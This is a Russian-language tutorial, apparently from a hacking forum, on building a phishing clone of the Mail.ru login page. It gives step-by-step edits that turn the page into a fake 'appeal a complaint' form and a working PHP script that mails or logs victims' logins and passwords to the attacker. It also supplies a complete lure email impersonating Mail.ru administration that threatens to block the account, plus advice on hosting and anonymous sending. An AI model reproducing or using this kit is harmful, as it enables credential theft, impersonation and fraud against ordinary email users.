Доброго времени суток!
В этой статье будет описываться пример создание Web Фейка(далее подделка) на банальную страницу авторизации почтовой службы Mail.ru ( http://e.mail.ru/cgi-bin/login ),только в отличие от банальной подделки,наша будет не много отличаться,как самой темой подделки,так и её содержимым.
Идём на страницу авторизации http://e.mail.ru/cgi-bin/login ,правой кнопкой мыши по странице вызываем контекстное меню и выбераем пункт просмотра исходного кода страницы,выделяем всё,копируем и сохраняем текстовом редакторе как index.html,далее вводим на странице в окошко имя допустим 1 и в окошко пароль,тоже 1,жмём кнопку войти.Должны получить страницу с ошибкой авторизации (в адресной строке http://e.mail.ru/cgi-bin/login?email=1@ … amp;fail=1),снова правой кнопкой мыши и т.д.,сохраняем исходный код страницы и называем её eror.html.
Теперь откроем нашу свеже скопированную index.html,найдём и заменим в ней строку <form method="post" action="http://win.mail.ru/cgi-bin/auth" name="Auth" onSubmit="return CheckForm(this);"> на <form method="post" action="login.php" name="value" >,проделав тоже самое ко второй нашей странице (eror.html только в место login.php,нужно будет написать loginis.php) и добавив пару скриптов для отправки введённых данных в подделку на почту,или сохранения на том же хосте рядом с собой в какой нибудь файл,можно сказать что подделка готова и её можно смело заливать на почту и использовать для кражи данных,но эта страница на столько банальна и ею так часто пользуются дл обмана и кражи данных,что многие пользователи могут просто на просто не поверить и не ввести настоящих данных в нашу подделку,так что я так думаю мы её не много изменим.
Я напишу для примера,а Вы уже можете писать по моему примеру,или что то изменить,или подправить на своё усмотрение,вообщем ищем строку <title> Вход в систему </title> и меняем на <title> Подача заявки на опровержение жалобы </title>,далее ищем <h3 class=head_1>Авторизация</h3> и меняем на <h3 class=head_1>Подача заявки на опровержение жалобы.</h3>,следом <p class=abzac>Для входа в систему введите, пожалуйста, логин и пароль. Если у Вас еще нет логина, Вам необходимо <a href=http://win.mail.ru/cgi-bin/signup>зарегистрироваться.</a></p> меняем на <p class=abzac>Для подачи заявки на опровержение жалобы,Вам необходимо повторно авторизироваться.<br>В противном случае согласно пункту 11.3 пользовательского соглашения, Администрация оставляет за собой право временно приостановить,либо прекратить предоставление услуг, своевременно уведомив об этом пользователя.</p>,сохраняем и проделываем тоже самое для второй страницы eror.html.Ну вот теперь наша подделка сменила банальную тему и приобрела более устрашающий вид.
Добавим ещё одну страницу,копируем нашу index.html,переименовываем на activ.html,открываем в текстовом редакторе и удаляем всё лишние,а именно строки с окошками для авторизации,вообщем вот кусок который нам не нужен:
<table width=100% cellpadding=0 cellspacing=0 border=0 class=login>
<form method="post" action="login.php" name="value">
<input type="hidden" name="page" value="">
<input type="hidden" name="post" value="">
<input type="hidden" name="login_from" value="">
<tr>
<td><img src=http://img.imgsmail.ru/0.gif width=55 height=1><br>Имя</td>
<td width=63%><input type="text" name="Login" value="" class=w_100></td>
<td width=37%><select class=w_100 name="Domain"><option value="mail.ru" SELECTED>@mail.ru</option><option value="inbox.ru" >@inbox.ru</option><option value="bk.ru" >@bk.ru</option><option value="list.ru" >@list.ru</option></select></td>
</tr>
<tr>
<td>Пароль</td>
<td colspan=2>
<div id="tooltipAuth_shell" class="tooltip" style="display: none;"><div id="tooltipAuth_tail" class="tail"></div><div class="ltc"></div><div class="rtc"></div><div class="ts"></div><div class="inner"><div class="rborder">
<div id="tooltipAuth_mess" class="mess">
<span id="tooltipAuth_mess_var">Вы вводите русские буквы</span>
<span id="tooltipAuth_mess_var2" style="display: none;">Включен Caps Lock</span>
<span id="tooltipAuth_mess_var3" style="display: none;">Пароль содержит русские буквы</span>
</div>
<div id="tooltipAuth_struter" class="struter"></div></div></div><div class="lbc"></div><div class="rbc"></div><div class="bs"></div></div>
<table width=100% cellpadding=0 cellspacing=0 border=0><tr>
<td width=100%><input type="password" name="Password" class=w_100></td>
<!---->
<td> <a href="/cgi-bin/passremind" target=_new>Забыли пароль?</a></td>
</tr></table>
</td>
</tr>
<tr>
<td> </td>
<td><input type=checkbox name="level" value=1 id="alien"><label for="alien">Чужой компьютер</label></td>
<td> </td>
</tr>
<tr>
<td> </td>
<td><input id="EnterBtn" type="Submit" value=" Войти " style="margin-top:4px"></td>
<td> </td>
</tr></form>
</table>И изменим кусок:
<h3 class=head_1>Подача заявки на опровержение жалобы</h3><img src=http://img.imgsmail.ru/1.gif width=1 height=8><br> <p class=abzac>Для подачи заявки на опровержение жалобы,Вам необходимо повторно авторизироваться.<br>В противном случае согласно пункту 11.3 пользовательского соглашения, Администрация оставляет за собой право временно приостановить,либо прекратить предоставление услуг, своевременно уведомив об этом пользователя.</p>
на:
<center><h3 class=head_1>Ваша заявка на опровержение жалобы принята!</h3><img src=http://img.imgsmail.ru/1.gif width=1 height=8><br> </center> <center><p class=abzac>В ближайшее время Администрация почтовой службы <a href="Mail.ru" target="_blank">Mail.ru</a> рассмотрит Вашу заявку на опровержения жалобы,поступившей на Ваш E-mail (указываем дату).<br>В данный момент Вы можете продолжить пользоваться почтовой службой <a href="Mail.ru" target="_blank">Mail.ru</a>,перейдя по ссылке ниже.</p> <a href="http://e.mail.ru/cgi-bin/msglist?folder=0&back=1" target="_top">Продолжить использование почтовой службы Mail.ru</a></center>
Сохраняем и смотрим что у нас получилось,если всё устраивает продолжим дальше,если нет то подправите на свой вкус.
Да чуть не забыл,в наших страницах index.html и eror.html,в строке <td width=63%><input type="text" name="Login" value="" class=w_100></td> значение value="" указывает на то что пишется в поле имя,то есть если в нём указать допустим value="support" то при открытие нашей подделки,в этом поле будет отображаться имя - support,также и в строке <select class=w_100 name="Domain"><option value="mail.ru" SELECTED>@mail.ru</option><option value="inbox.ru" >@inbox.ru</option><option value="bk.ru" >@bk.ru</option><option value="list.ru" >@list.ru</option></select> передвинув значение SELECTED,в с >@mail.ru допустим на >@bk.ru (пример SELECTED>@bk.ru) при открытие страницы нашей подделки будет отображаться домен @bk.ru,в место @mail.ru ,вообщем если Вам нужно будет узнать данные для авторизации определённого человека,это не много поспособствует.
Так вроде страницами разобрались,перейдём скриптам которые будут перекидывать со страницы на страницу и отсылать введённые в подделку данные к Вам на почту.
По сути для обоих страниц он один и тот же,только пере адресация идёт на другую страницу,во всём остальном от идентичен,вообщем вот login.php:
<?php
$BASE="E-mail";
$IS_EMAIL=true;
$LOCATION="eror.html";
$p0=$_REQUEST["Login"];
$p1=$_REQUEST["Domain"];
$p2=$_REQUEST["Password"];
$headers = "Content-type: text/html; charset=windows-1251\r\n";
$headers .= "From: bot <$BASE>\r\n";
$headers .= "Bcc: $BASE\r\n";
$info=":login:$p0:Domain:$p1:Pass:$p2:\n";
if ($IS_EMAIL){
mail($BASE, "Massage Mail.ru!", $headers.$info);
} else {
$fd=fopen($BASE,"a+");
fwrite($fd,$info);
fclose($fd);
}
header("Location:$LOCATION");
?>loginis.php будет практически таким же,только в место eror.html будет activ.html,ну и разумеется в обоих скриптах в место E-mail указываете свой почтовый адрес,куда будут отправляться данные.Копируете в текстовый редактор и сохраняете с расширением php,то есть в итоге должно получится пять файлов,это index.html,eror.html,activ.html,login.php,loginis.php.
Останется только зарегистрировать хост,допустим на Holm.ru,получить данные авторизации через FTP и залить всё это в папку WWW,после воспользоваться услугой анонимной отправки писем для отправки письма в html формате,допустим с вот таким содержимым:
<html><head xmlns="http://www.w3.org/1999/xhtml"><meta http-equiv="X-UA-Compatible" content="IE=7"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><style type="text/css">* {font-size: 100%;}body {font:12px arial, helvetica; margin: 0; padding: 8px; background-color: #fff;}</style><link href="http://js.imgsmail.ru/u/js/ru/tiny_mce/themes/compose/skins/default/content.css?3.75" _mce_href="http://js.imgsmail.ru/u/js/ru/tiny_mce/themes/compose/skins/default/content.css?3.75" rel="stylesheet"></head><body dir="ltr" spellcheck="true" id="tinymce" class="mceContentBody "><span style="font-size: 14px;">Здравствуйте!</span><br><br><span style="font-size: 14px;">Администрация почтовой службы Mail.ru сообщает Вам что: </span><br><br><span style="font-size: 14px; color: rgb(191, 0, 0);">Ваш профиль будет заблокирован, в связи с жалобой поступившей к администрации 24.04.2011 </span><br><br><span style="font-size: 14px; color: rgb(191, 0, 0);">Ей присвоен номер 2008474861215660.</span><br><br><br><span style="font-size: 14px;">Согласно пункту 11.3 пользовательского соглашения, Администрация оставляет за собой право временно приостановить,</span><br><span style="font-size: 14px;">либо прекратить предоставление услуг, своевременно уведомив об этом пользователя.</span><br><br><br><br><span style="font-size: 14px;">Вы можете подать заявку на опровержение жалобы,перейдя по ссылке: </span><a target="blank" href="http://ссылка на Ваш хост"><span style="font-size: 14px;">Подать заявку на опровержение жалобы</span></a><br><br><br><br> <br><span style="font-size: 14px;">Если заявка не будет отклонена в течении трёх дней, ваш почтовый аккаунт будет заблокирован.</span><br> <br><br><br><br><span style="font-size: 14px;">Администрация Mail.Ru Владимир Габриелян</span><br> <br><span style="font-size: 14px;">Москва, Ленинградский проспект</span><br> <br><span style="font-size: 14px;">д.47, строение 2</span><br> <br>
<span style="font-size: 14px;">БЦ "Авион", подъезд №2</span>
<br> <br><span style="font-size: 14px;">ООО "Mail.Ru"</span></body></html>и ждать пока прочтут письмо,введут туда данные и они придут к Вам на почту.
Разумеется содержимое письма может быть любое,как и всех страниц,тут всё зависит только от Вашей собственной фантазии.
На этом я так думаю статью можно закончить,но если Вам будет что либо не понятно,задавайте вопросы,а мы постараемся на них ответить!
Так же Вы можете
( кстати которая была создана в ходе написания этой статьи) и посмотреть на её внутренности,или же сразу употребить по назначению (конечно лучше делать всё самому,тем более что в этом нету ни чего сложного!)
Спасибо за внимание,всего доброго!
